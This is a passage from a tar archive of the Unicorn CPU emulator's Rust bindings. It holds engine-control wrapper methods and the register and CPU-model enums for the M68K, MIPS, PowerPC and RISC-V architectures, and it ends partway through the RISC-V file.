the current block. pub fn emu_stop(&mut self) -> Result<(), uc_error> { unsafe { ffi::uc_emu_stop(self.get_handle()).into() } } /// Query the internal status of the engine. /// /// supported: `MODE`, `PAGE_SIZE`, `ARCH` pub fn query(&self, query: Query) -> Result<usize, uc_error> { let mut result: libc::size_t = Default::default(); unsafe { ffi::uc_query(self.get_handle(), query, &mut result) }.and(Ok(result)) } /// Get the `i32` register value for the program counter for the specified architecture. /// /// If an architecture is not compiled in, this function will return `uc_error::ARCH`. #[inline] fn arch_to_pc_register(arch: Arch) -> Result<i32, uc_error> { match arch { #[cfg(feature = "arch_x86")] Arch::X86 => Ok(RegisterX86::RIP as i32), #[cfg(feature = "arch_arm")] Arch::ARM => Ok(RegisterARM::PC as i32), #[cfg(feature = "arch_arm")] Arch::ARM64 => Ok(RegisterARM64::PC as i32), #[cfg(feature = "arch_mips")] Arch::MIPS => Ok(RegisterMIPS::PC as i32), #[cfg(feature = "arch_sparc")] Arch::SPARC => Ok(RegisterSPARC::PC as i32), #[cfg(feature = "arch_m68k")] Arch::M68K => Ok(RegisterM68K::PC as i32), #[cfg(feature = "arch_ppc")] Arch::PPC => Ok(RegisterPPC::PC as i32), #[cfg(feature = "arch_riscv")] Arch::RISCV => Ok(RegisterRISCV::PC as i32), #[cfg(feature = "arch_s390x")] Arch::S390X => Ok(RegisterS390X::PC as i32), #[cfg(feature = "arch_tricore")] Arch::TRICORE => Ok(RegisterTRICORE::PC as i32), // returns `uc_error::ARCH` for `Arch::MAX`, and any // other architecture that are not compiled in _ => Err(uc_error::ARCH), } } /// Gets the current program counter for this `unicorn` instance. #[inline] pub fn pc_read(&self) -> Result<u64, uc_error> { let arch = self.get_arch(); self.reg_read(Self::arch_to_pc_register(arch)?) } /// Sets the program counter for this `unicorn` instance. #[inline] pub fn set_pc(&mut self, value: u64) -> Result<(), uc_error> { let arch = self.get_arch(); self.reg_write(Self::arch_to_pc_register(arch)?, value) } pub fn ctl_get_mode(&self) -> Result<Mode, uc_error> { let mut result: i32 = Default::default(); unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ!(ControlType::UC_CTL_UC_MODE), &mut result, ) } .and_then(|| Ok(Mode::from_bits_truncate(result))) } pub fn ctl_get_page_size(&self) -> Result<u32, uc_error> { let mut result: u32 = Default::default(); unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ!(ControlType::UC_CTL_UC_PAGE_SIZE), &mut result, ) } .and_then(|| Ok(result)) } pub fn ctl_set_page_size(&self, page_size: u32) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_UC_PAGE_SIZE), page_size, ) } .into() } pub fn ctl_get_arch(&self) -> Result<Arch, uc_error> { let mut result: i32 = Default::default(); unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ!(ControlType::UC_CTL_UC_ARCH), &mut result, ) } .and_then(|| Arch::try_from(result as usize)) } pub fn ctl_get_timeout(&self) -> Result<u64, uc_error> { let mut result: u64 = Default::default(); unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ!(ControlType::UC_CTL_UC_TIMEOUT), &mut result, ) } .and(Ok(result)) } pub fn ctl_exits_enable(&self) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_UC_USE_EXITS), 1, ) } .into() } pub fn ctl_exits_disable(&self) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_UC_USE_EXITS), 0, ) } .into() } pub fn ctl_get_exits_count(&self) -> Result<usize, uc_error> { let mut result: libc::size_t = 0usize; unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ!(ControlType::UC_CTL_UC_EXITS_CNT), &mut result, ) } .and(Ok(result)) } pub fn ctl_get_exits(&self) -> Result<Vec<u64>, uc_error> { let exits_count: libc::size_t = self.ctl_get_exits_count()?; let mut exits: Vec<u64> = Vec::with_capacity(exits_count); unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ!(ControlType::UC_CTL_UC_EXITS), exits.as_mut_ptr(), exits_count, ) } .and_then(|| unsafe { exits.set_len(exits_count); Ok(exits) }) } pub fn ctl_set_exits(&self, exits: &[u64]) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_UC_EXITS), exits.as_ptr(), exits.len() as libc::size_t, ) } .into() } pub fn ctl_get_cpu_model(&self) -> Result<i32, uc_error> { let mut result: i32 = Default::default(); unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ!(ControlType::UC_CTL_CPU_MODEL), &mut result, ) } .and(Ok(result)) } pub fn ctl_set_cpu_model(&self, cpu_model: i32) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_CPU_MODEL), cpu_model, ) } .into() } pub fn ctl_remove_cache(&self, address: u64, end: u64) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_TB_REMOVE_CACHE), address, end, ) } .into() } pub fn ctl_request_cache( &self, address: u64, tb: &mut TranslationBlock, ) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_READ_WRITE!(ControlType::UC_CTL_TB_REQUEST_CACHE), address, tb, ) } .into() } pub fn ctl_flush_tb(&self) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_TB_FLUSH), ) } .into() } pub fn ctl_flush_tlb(&self) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_TLB_FLUSH), ) } .into() } pub fn ctl_context_mode(&self, mode: ContextMode) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_CONTEXT_MODE), mode, ) } .into() } pub fn ctl_tlb_type(&self, t: TlbType) -> Result<(), uc_error> { unsafe { ffi::uc_ctl( self.get_handle(), UC_CTL_WRITE!(ControlType::UC_CTL_TLB_TYPE), t as i32, ) } .into() } } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/m68k.rs�������������������������������������������������������������0000664�0000000�0000000�00000001667�14675241067�0017732�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // M68K registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterM68K { INVALID = 0, A0, A1, A2, A3, A4, A5, A6, A7, D0, D1, D2, D3, D4, D5, D6, D7, SR, PC, ENDING, } impl From<RegisterM68K> for i32 { fn from(r: RegisterM68K) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum M68kCpuModel { UC_CPU_M68K_M5206 = 0, UC_CPU_M68K_M68000 = 1, UC_CPU_M68K_M68020 = 2, UC_CPU_M68K_M68030 = 3, UC_CPU_M68K_M68040 = 4, UC_CPU_M68K_M68060 = 5, UC_CPU_M68K_M5208 = 6, UC_CPU_M68K_CFV4E = 7, UC_CPU_M68K_ANY = 8, } impl From<M68kCpuModel> for i32 { fn from(value: M68kCpuModel) -> Self { value as i32 } } impl From<&M68kCpuModel> for i32 { fn from(value: &M68kCpuModel) -> Self { (*value) as i32 } } �������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/mips.rs�������������������������������������������������������������0000664�0000000�0000000�00000014473�14675241067�0020114�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT // MIPS registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterMIPS { INVALID = 0, // General purpose registers PC = 1, R0 = 2, R1 = 3, R2 = 4, R3 = 5, R4 = 6, R5 = 7, R6 = 8, R7 = 9, R8 = 10, R9 = 11, R10 = 12, R11 = 13, R12 = 14, R13 = 15, R14 = 16, R15 = 17, R16 = 18, R17 = 19, R18 = 20, R19 = 21, R20 = 22, R21 = 23, R22 = 24, R23 = 25, R24 = 26, R25 = 27, R26 = 28, R27 = 29, R28 = 30, R29 = 31, R30 = 32, R31 = 33, // DSP registers DSPCCOND = 34, DSPCARRY = 35, DSPEFI = 36, DSPOUTFLAG = 37, DSPOUTFLAG16_19 = 38, DSPOUTFLAG20 = 39, DSPOUTFLAG21 = 40, DSPOUTFLAG22 = 41, DSPOUTFLAG23 = 42, DSPPOS = 43, DSPSCOUNT = 44, // ACC registers AC0 = 45, AC1 = 46, AC2 = 47, AC3 = 48, // COP registers CC0 = 49, CC1 = 50, CC2 = 51, CC3 = 52, CC4 = 53, CC5 = 54, CC6 = 55, CC7 = 56, // FPU registers F0 = 57, F1 = 58, F2 = 59, F3 = 60, F4 = 61, F5 = 62, F6 = 63, F7 = 64, F8 = 65, F9 = 66, F10 = 67, F11 = 68, F12 = 69, F13 = 70, F14 = 71, F15 = 72, F16 = 73, F17 = 74, F18 = 75, F19 = 76, F20 = 77, F21 = 78, F22 = 79, F23 = 80, F24 = 81, F25 = 82, F26 = 83, F27 = 84, F28 = 85, F29 = 86, F30 = 87, F31 = 88, FCC0 = 89, FCC1 = 90, FCC2 = 91, FCC3 = 92, FCC4 = 93, FCC5 = 94, FCC6 = 95, FCC7 = 96, // AFPR128 W0 = 97, W1 = 98, W2 = 99, W3 = 100, W4 = 101, W5 = 102, W6 = 103, W7 = 104, W8 = 105, W9 = 106, W10 = 107, W11 = 108, W12 = 109, W13 = 110, W14 = 111, W15 = 112, W16 = 113, W17 = 114, W18 = 115, W19 = 116, W20 = 117, W21 = 118, W22 = 119, W23 = 120, W24 = 121, W25 = 122, W26 = 123, W27 = 124, W28 = 125, W29 = 126, W30 = 127, W31 = 128, HI = 129, LO = 130, P0 = 131, P1 = 132, P2 = 133, MPL0 = 134, MPL1 = 135, MPL2 = 136, CP0_CONFIG3 = 137, CP0_USERLOCAL = 138, CP0_STATUS = 139, ENDING = 140, } impl RegisterMIPS { // alias registers // (assoc) ZERO = 2, // (assoc) AT = 3, // (assoc) V0 = 4, // (assoc) V1 = 5, // (assoc) A0 = 6, // (assoc) A1 = 7, // (assoc) A2 = 8, // (assoc) A3 = 9, // (assoc) T0 = 10, // (assoc) T1 = 11, // (assoc) T2 = 12, // (assoc) T3 = 13, // (assoc) T4 = 14, // (assoc) T5 = 15, // (assoc) T6 = 16, // (assoc) T7 = 17, // (assoc) S0 = 18, // (assoc) S1 = 19, // (assoc) S2 = 20, // (assoc) S3 = 21, // (assoc) S4 = 22, // (assoc) S5 = 23, // (assoc) S6 = 24, // (assoc) S7 = 25, // (assoc) T8 = 26, // (assoc) T9 = 27, // (assoc) K0 = 28, // (assoc) K1 = 29, // (assoc) GP = 30, // (assoc) SP = 31, // (assoc) FP = 32, // (assoc) S8 = 32, // (assoc) RA = 33, // (assoc) HI0 = 45, // (assoc) HI1 = 46, // (assoc) HI2 = 47, // (assoc) HI3 = 48, // (assoc) LO0 = 45, // (assoc) LO1 = 46, // (assoc) LO2 = 47, // (assoc) LO3 = 48, pub const ZERO: RegisterMIPS = RegisterMIPS::R0; pub const AT: RegisterMIPS = RegisterMIPS::R1; pub const V0: RegisterMIPS = RegisterMIPS::R2; pub const V1: RegisterMIPS = RegisterMIPS::R3; pub const A0: RegisterMIPS = RegisterMIPS::R4; pub const A1: RegisterMIPS = RegisterMIPS::R5; pub const A2: RegisterMIPS = RegisterMIPS::R6; pub const A3: RegisterMIPS = RegisterMIPS::R7; pub const T0: RegisterMIPS = RegisterMIPS::R8; pub const T1: RegisterMIPS = RegisterMIPS::R9; pub const T2: RegisterMIPS = RegisterMIPS::R10; pub const T3: RegisterMIPS = RegisterMIPS::R11; pub const T4: RegisterMIPS = RegisterMIPS::R12; pub const T5: RegisterMIPS = RegisterMIPS::R13; pub const T6: RegisterMIPS = RegisterMIPS::R14; pub const T7: RegisterMIPS = RegisterMIPS::R15; pub const S0: RegisterMIPS = RegisterMIPS::R16; pub const S1: RegisterMIPS = RegisterMIPS::R17; pub const S2: RegisterMIPS = RegisterMIPS::R18; pub const S3: RegisterMIPS = RegisterMIPS::R19; pub const S4: RegisterMIPS = RegisterMIPS::R20; pub const S5: RegisterMIPS = RegisterMIPS::R21; pub const S6: RegisterMIPS = RegisterMIPS::R22; pub const S7: RegisterMIPS = RegisterMIPS::R23; pub const T8: RegisterMIPS = RegisterMIPS::R24; pub const T9: RegisterMIPS = RegisterMIPS::R25; pub const K0: RegisterMIPS = RegisterMIPS::R26; pub const K1: RegisterMIPS = RegisterMIPS::R27; pub const GP: RegisterMIPS = RegisterMIPS::R28; pub const SP: RegisterMIPS = RegisterMIPS::R29; pub const FP: RegisterMIPS = RegisterMIPS::R30; pub const S8: RegisterMIPS = RegisterMIPS::R30; pub const RA: RegisterMIPS = RegisterMIPS::R31; pub const HI0: RegisterMIPS = RegisterMIPS::AC0; pub const HI1: RegisterMIPS = RegisterMIPS::AC1; pub const HI2: RegisterMIPS = RegisterMIPS::AC2; pub const HI3: RegisterMIPS = RegisterMIPS::AC3; pub const LO0: RegisterMIPS = RegisterMIPS::AC0; pub const LO1: RegisterMIPS = RegisterMIPS::AC1; pub const LO2: RegisterMIPS = RegisterMIPS::AC2; pub const LO3: RegisterMIPS = RegisterMIPS::AC3; } impl From<RegisterMIPS> for i32 { fn from(r: RegisterMIPS) -> Self { r as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Mips32CpuModel { UC_CPU_MIPS32_4KC = 0, UC_CPU_MIPS32_4KM = 1, UC_CPU_MIPS32_4KECR1 = 2, UC_CPU_MIPS32_4KEMR1 = 3, UC_CPU_MIPS32_4KEC = 4, UC_CPU_MIPS32_4KEM = 5, UC_CPU_MIPS32_24KC = 6, UC_CPU_MIPS32_24KEC = 7, UC_CPU_MIPS32_24KF = 8, UC_CPU_MIPS32_34KF = 9, UC_CPU_MIPS32_74KF = 10, UC_CPU_MIPS32_M14K = 11, UC_CPU_MIPS32_M14KC = 12, UC_CPU_MIPS32_P5600 = 13, UC_CPU_MIPS32_MIPS32R6_GENERIC = 14, UC_CPU_MIPS32_I7200 = 15, } impl From<Mips32CpuModel> for i32 { fn from(value: Mips32CpuModel) -> Self { value as i32 } } impl From<&Mips32CpuModel> for i32 { fn from(value: &Mips32CpuModel) -> Self { *value as i32 } } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/ppc.rs��������������������������������������������������������������0000664�0000000�0000000�00000024461�14675241067�0017724�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT // PowerPC registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterPPC { INVALID = 0, PC = 1, R0 = 2, R1 = 3, R2 = 4, R3 = 5, R4 = 6, R5 = 7, R6 = 8, R7 = 9, R8 = 10, R9 = 11, R10 = 12, R11 = 13, R12 = 14, R13 = 15, R14 = 16, R15 = 17, R16 = 18, R17 = 19, R18 = 20, R19 = 21, R20 = 22, R21 = 23, R22 = 24, R23 = 25, R24 = 26, R25 = 27, R26 = 28, R27 = 29, R28 = 30, R29 = 31, R30 = 32, R31 = 33, CR0 = 34, CR1 = 35, CR2 = 36, CR3 = 37, CR4 = 38, CR5 = 39, CR6 = 40, CR7 = 41, FPR0 = 42, FPR1 = 43, FPR2 = 44, FPR3 = 45, FPR4 = 46, FPR5 = 47, FPR6 = 48, FPR7 = 49, FPR8 = 50, FPR9 = 51, FPR10 = 52, FPR11 = 53, FPR12 = 54, FPR13 = 55, FPR14 = 56, FPR15 = 57, FPR16 = 58, FPR17 = 59, FPR18 = 60, FPR19 = 61, FPR20 = 62, FPR21 = 63, FPR22 = 64, FPR23 = 65, FPR24 = 66, FPR25 = 67, FPR26 = 68, FPR27 = 69, FPR28 = 70, FPR29 = 71, FPR30 = 72, FPR31 = 73, LR = 74, XER = 75, CTR = 76, MSR = 77, FPSCR = 78, CR = 79, ENDING = 80, } impl From<RegisterPPC> for i32 { fn from(r: RegisterPPC) -> Self { r as i32 } } #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum PpcCpuModel { UC_CPU_PPC32_401 = 0, UC_CPU_PPC32_401A1, UC_CPU_PPC32_401B2, UC_CPU_PPC32_401C2, UC_CPU_PPC32_401D2, UC_CPU_PPC32_401E2, UC_CPU_PPC32_401F2, UC_CPU_PPC32_401G2, UC_CPU_PPC32_IOP480, UC_CPU_PPC32_COBRA, UC_CPU_PPC32_403GA, UC_CPU_PPC32_403GB, UC_CPU_PPC32_403GC, UC_CPU_PPC32_403GCX, UC_CPU_PPC32_405D2, UC_CPU_PPC32_405D4, UC_CPU_PPC32_405CRA, UC_CPU_PPC32_405CRB, UC_CPU_PPC32_405CRC, UC_CPU_PPC32_405EP, UC_CPU_PPC32_405EZ, UC_CPU_PPC32_405GPA, UC_CPU_PPC32_405GPB, UC_CPU_PPC32_405GPC, UC_CPU_PPC32_405GPD, UC_CPU_PPC32_405GPR, UC_CPU_PPC32_405LP, UC_CPU_PPC32_NPE405H, UC_CPU_PPC32_NPE405H2, UC_CPU_PPC32_NPE405L, UC_CPU_PPC32_NPE4GS3, UC_CPU_PPC32_STB03, UC_CPU_PPC32_STB04, UC_CPU_PPC32_STB25, UC_CPU_PPC32_X2VP4, UC_CPU_PPC32_X2VP20, UC_CPU_PPC32_440_XILINX, UC_CPU_PPC32_440_XILINX_W_DFPU, UC_CPU_PPC32_440EPA, UC_CPU_PPC32_440EPB, UC_CPU_PPC32_440EPX, UC_CPU_PPC32_460EXB, UC_CPU_PPC32_G2, UC_CPU_PPC32_G2H4, UC_CPU_PPC32_G2GP, UC_CPU_PPC32_G2LS, UC_CPU_PPC32_G2HIP3, UC_CPU_PPC32_G2HIP4, UC_CPU_PPC32_MPC603, UC_CPU_PPC32_G2LE, UC_CPU_PPC32_G2LEGP, UC_CPU_PPC32_G2LELS, UC_CPU_PPC32_G2LEGP1, UC_CPU_PPC32_G2LEGP3, UC_CPU_PPC32_MPC5200_V10, UC_CPU_PPC32_MPC5200_V11, UC_CPU_PPC32_MPC5200_V12, UC_CPU_PPC32_MPC5200B_V20, UC_CPU_PPC32_MPC5200B_V21, UC_CPU_PPC32_E200Z5, UC_CPU_PPC32_E200Z6, UC_CPU_PPC32_E300C1, UC_CPU_PPC32_E300C2, UC_CPU_PPC32_E300C3, UC_CPU_PPC32_E300C4, UC_CPU_PPC32_MPC8343, UC_CPU_PPC32_MPC8343A, UC_CPU_PPC32_MPC8343E, UC_CPU_PPC32_MPC8343EA, UC_CPU_PPC32_MPC8347T, UC_CPU_PPC32_MPC8347P, UC_CPU_PPC32_MPC8347AT, UC_CPU_PPC32_MPC8347AP, UC_CPU_PPC32_MPC8347ET, UC_CPU_PPC32_MPC8347EP, UC_CPU_PPC32_MPC8347EAT, UC_CPU_PPC32_MPC8347EAP, UC_CPU_PPC32_MPC8349, UC_CPU_PPC32_MPC8349A, UC_CPU_PPC32_MPC8349E, UC_CPU_PPC32_MPC8349EA, UC_CPU_PPC32_MPC8377, UC_CPU_PPC32_MPC8377E, UC_CPU_PPC32_MPC8378, UC_CPU_PPC32_MPC8378E, UC_CPU_PPC32_MPC8379, UC_CPU_PPC32_MPC8379E, UC_CPU_PPC32_E500_V10, UC_CPU_PPC32_E500_V20, UC_CPU_PPC32_E500V2_V10, UC_CPU_PPC32_E500V2_V20, UC_CPU_PPC32_E500V2_V21, UC_CPU_PPC32_E500V2_V22, UC_CPU_PPC32_E500V2_V30, UC_CPU_PPC32_E500MC, UC_CPU_PPC32_MPC8533_V10, UC_CPU_PPC32_MPC8533_V11, UC_CPU_PPC32_MPC8533E_V10, UC_CPU_PPC32_MPC8533E_V11, UC_CPU_PPC32_MPC8540_V10, UC_CPU_PPC32_MPC8540_V20, UC_CPU_PPC32_MPC8540_V21, UC_CPU_PPC32_MPC8541_V10, UC_CPU_PPC32_MPC8541_V11, UC_CPU_PPC32_MPC8541E_V10, UC_CPU_PPC32_MPC8541E_V11, UC_CPU_PPC32_MPC8543_V10, UC_CPU_PPC32_MPC8543_V11, UC_CPU_PPC32_MPC8543_V20, UC_CPU_PPC32_MPC8543_V21, UC_CPU_PPC32_MPC8543E_V10, UC_CPU_PPC32_MPC8543E_V11, UC_CPU_PPC32_MPC8543E_V20, UC_CPU_PPC32_MPC8543E_V21, UC_CPU_PPC32_MPC8544_V10, UC_CPU_PPC32_MPC8544_V11, UC_CPU_PPC32_MPC8544E_V10, UC_CPU_PPC32_MPC8544E_V11, UC_CPU_PPC32_MPC8545_V20, UC_CPU_PPC32_MPC8545_V21, UC_CPU_PPC32_MPC8545E_V20, UC_CPU_PPC32_MPC8545E_V21, UC_CPU_PPC32_MPC8547E_V20, UC_CPU_PPC32_MPC8547E_V21, UC_CPU_PPC32_MPC8548_V10, UC_CPU_PPC32_MPC8548_V11, UC_CPU_PPC32_MPC8548_V20, UC_CPU_PPC32_MPC8548_V21, UC_CPU_PPC32_MPC8548E_V10, UC_CPU_PPC32_MPC8548E_V11, UC_CPU_PPC32_MPC8548E_V20, UC_CPU_PPC32_MPC8548E_V21, UC_CPU_PPC32_MPC8555_V10, UC_CPU_PPC32_MPC8555_V11, UC_CPU_PPC32_MPC8555E_V10, UC_CPU_PPC32_MPC8555E_V11, UC_CPU_PPC32_MPC8560_V10, UC_CPU_PPC32_MPC8560_V20, UC_CPU_PPC32_MPC8560_V21, UC_CPU_PPC32_MPC8567, UC_CPU_PPC32_MPC8567E, UC_CPU_PPC32_MPC8568, UC_CPU_PPC32_MPC8568E, UC_CPU_PPC32_MPC8572, UC_CPU_PPC32_MPC8572E, UC_CPU_PPC32_E600, UC_CPU_PPC32_MPC8610, UC_CPU_PPC32_MPC8641, UC_CPU_PPC32_MPC8641D, UC_CPU_PPC32_601_V0, UC_CPU_PPC32_601_V1, UC_CPU_PPC32_601_V2, UC_CPU_PPC32_602, UC_CPU_PPC32_603, UC_CPU_PPC32_603E_V1_1, UC_CPU_PPC32_603E_V1_2, UC_CPU_PPC32_603E_V1_3, UC_CPU_PPC32_603E_V1_4, UC_CPU_PPC32_603E_V2_2, UC_CPU_PPC32_603E_V3, UC_CPU_PPC32_603E_V4, UC_CPU_PPC32_603E_V4_1, UC_CPU_PPC32_603E7, UC_CPU_PPC32_603E7T, UC_CPU_PPC32_603E7V, UC_CPU_PPC32_603E7V1, UC_CPU_PPC32_603E7V2, UC_CPU_PPC32_603P, UC_CPU_PPC32_604, UC_CPU_PPC32_604E_V1_0, UC_CPU_PPC32_604E_V2_2, UC_CPU_PPC32_604E_V2_4, UC_CPU_PPC32_604R, UC_CPU_PPC32_740_V1_0, UC_CPU_PPC32_750_V1_0, UC_CPU_PPC32_740_V2_0, UC_CPU_PPC32_750_V2_0, UC_CPU_PPC32_740_V2_1, UC_CPU_PPC32_750_V2_1, UC_CPU_PPC32_740_V2_2, UC_CPU_PPC32_750_V2_2, UC_CPU_PPC32_740_V3_0, UC_CPU_PPC32_750_V3_0, UC_CPU_PPC32_740_V3_1, UC_CPU_PPC32_750_V3_1, UC_CPU_PPC32_740E, UC_CPU_PPC32_750E, UC_CPU_PPC32_740P, UC_CPU_PPC32_750P, UC_CPU_PPC32_750CL_V1_0, UC_CPU_PPC32_750CL_V2_0, UC_CPU_PPC32_750CX_V1_0, UC_CPU_PPC32_750CX_V2_0, UC_CPU_PPC32_750CX_V2_1, UC_CPU_PPC32_750CX_V2_2, UC_CPU_PPC32_750CXE_V2_1, UC_CPU_PPC32_750CXE_V2_2, UC_CPU_PPC32_750CXE_V2_3, UC_CPU_PPC32_750CXE_V2_4, UC_CPU_PPC32_750CXE_V2_4B, UC_CPU_PPC32_750CXE_V3_0, UC_CPU_PPC32_750CXE_V3_1, UC_CPU_PPC32_750CXE_V3_1B, UC_CPU_PPC32_750CXR, UC_CPU_PPC32_750FL, UC_CPU_PPC32_750FX_V1_0, UC_CPU_PPC32_750FX_V2_0, UC_CPU_PPC32_750FX_V2_1, UC_CPU_PPC32_750FX_V2_2, UC_CPU_PPC32_750FX_V2_3, UC_CPU_PPC32_750GL, UC_CPU_PPC32_750GX_V1_0, UC_CPU_PPC32_750GX_V1_1, UC_CPU_PPC32_750GX_V1_2, UC_CPU_PPC32_750L_V2_0, UC_CPU_PPC32_750L_V2_1, UC_CPU_PPC32_750L_V2_2, UC_CPU_PPC32_750L_V3_0, UC_CPU_PPC32_750L_V3_2, UC_CPU_PPC32_745_V1_0, UC_CPU_PPC32_755_V1_0, UC_CPU_PPC32_745_V1_1, UC_CPU_PPC32_755_V1_1, UC_CPU_PPC32_745_V2_0, UC_CPU_PPC32_755_V2_0, UC_CPU_PPC32_745_V2_1, UC_CPU_PPC32_755_V2_1, UC_CPU_PPC32_745_V2_2, UC_CPU_PPC32_755_V2_2, UC_CPU_PPC32_745_V2_3, UC_CPU_PPC32_755_V2_3, UC_CPU_PPC32_745_V2_4, UC_CPU_PPC32_755_V2_4, UC_CPU_PPC32_745_V2_5, UC_CPU_PPC32_755_V2_5, UC_CPU_PPC32_745_V2_6, UC_CPU_PPC32_755_V2_6, UC_CPU_PPC32_745_V2_7, UC_CPU_PPC32_755_V2_7, UC_CPU_PPC32_745_V2_8, UC_CPU_PPC32_755_V2_8, UC_CPU_PPC32_7400_V1_0, UC_CPU_PPC32_7400_V1_1, UC_CPU_PPC32_7400_V2_0, UC_CPU_PPC32_7400_V2_1, UC_CPU_PPC32_7400_V2_2, UC_CPU_PPC32_7400_V2_6, UC_CPU_PPC32_7400_V2_7, UC_CPU_PPC32_7400_V2_8, UC_CPU_PPC32_7400_V2_9, UC_CPU_PPC32_7410_V1_0, UC_CPU_PPC32_7410_V1_1, UC_CPU_PPC32_7410_V1_2, UC_CPU_PPC32_7410_V1_3, UC_CPU_PPC32_7410_V1_4, UC_CPU_PPC32_7448_V1_0, UC_CPU_PPC32_7448_V1_1, UC_CPU_PPC32_7448_V2_0, UC_CPU_PPC32_7448_V2_1, UC_CPU_PPC32_7450_V1_0, UC_CPU_PPC32_7450_V1_1, UC_CPU_PPC32_7450_V1_2, UC_CPU_PPC32_7450_V2_0, UC_CPU_PPC32_7450_V2_1, UC_CPU_PPC32_7441_V2_1, UC_CPU_PPC32_7441_V2_3, UC_CPU_PPC32_7451_V2_3, UC_CPU_PPC32_7441_V2_10, UC_CPU_PPC32_7451_V2_10, UC_CPU_PPC32_7445_V1_0, UC_CPU_PPC32_7455_V1_0, UC_CPU_PPC32_7445_V2_1, UC_CPU_PPC32_7455_V2_1, UC_CPU_PPC32_7445_V3_2, UC_CPU_PPC32_7455_V3_2, UC_CPU_PPC32_7445_V3_3, UC_CPU_PPC32_7455_V3_3, UC_CPU_PPC32_7445_V3_4, UC_CPU_PPC32_7455_V3_4, UC_CPU_PPC32_7447_V1_0, UC_CPU_PPC32_7457_V1_0, UC_CPU_PPC32_7447_V1_1, UC_CPU_PPC32_7457_V1_1, UC_CPU_PPC32_7457_V1_2, UC_CPU_PPC32_7447A_V1_0, UC_CPU_PPC32_7457A_V1_0, UC_CPU_PPC32_7447A_V1_1, UC_CPU_PPC32_7457A_V1_1, UC_CPU_PPC32_7447A_V1_2, UC_CPU_PPC32_7457A_V1_2, } impl From<PpcCpuModel> for i32 { fn from(value: PpcCpuModel) -> Self { value as i32 } } impl From<&PpcCpuModel> for i32 { fn from(value: &PpcCpuModel) -> Self { (*value) as i32 } } #[repr(i32)] #[derive(Debug, Copy, Clone, PartialEq, Eq)] pub enum Ppc64CpuModel { UC_CPU_PPC64_E5500 = 0, UC_CPU_PPC64_E6500, UC_CPU_PPC64_970_V2_2, UC_CPU_PPC64_970FX_V1_0, UC_CPU_PPC64_970FX_V2_0, UC_CPU_PPC64_970FX_V2_1, UC_CPU_PPC64_970FX_V3_0, UC_CPU_PPC64_970FX_V3_1, UC_CPU_PPC64_970MP_V1_0, UC_CPU_PPC64_970MP_V1_1, UC_CPU_PPC64_POWER5_V2_1, UC_CPU_PPC64_POWER7_V2_3, UC_CPU_PPC64_POWER7_V2_1, UC_CPU_PPC64_POWER8E_V2_1, UC_CPU_PPC64_POWER8_V2_0, UC_CPU_PPC64_POWER8NVL_V1_0, UC_CPU_PPC64_POWER9_V1_0, UC_CPU_PPC64_POWER9_V2_0, UC_CPU_PPC64_POWER10_V1_0, } impl From<Ppc64CpuModel> for i32 { fn from(value: Ppc64CpuModel) -> Self { value as i32 } } impl From<&Ppc64CpuModel> for i32 { fn from(value: &Ppc64CpuModel) -> Self { (*value) as i32 } } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/rust/src/riscv.rs������������������������������������������������������������0000664�0000000�0000000�00000023247�14675241067�0020271�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#![allow(non_camel_case_types)] // RISCV registers #[repr(C)] #[derive(PartialEq, Debug, Clone, Copy)] pub enum RegisterRISCV { INVALID = 0, // General purpose registers X0 = 1, X1 = 2, X2 = 3, X3 = 4, X4 = 5, X5 = 6, X6 = 7, X7 = 8, X8 = 9, X9 = 10, X10 = 11, X11 = 12, X12 = 13, X13 = 14, 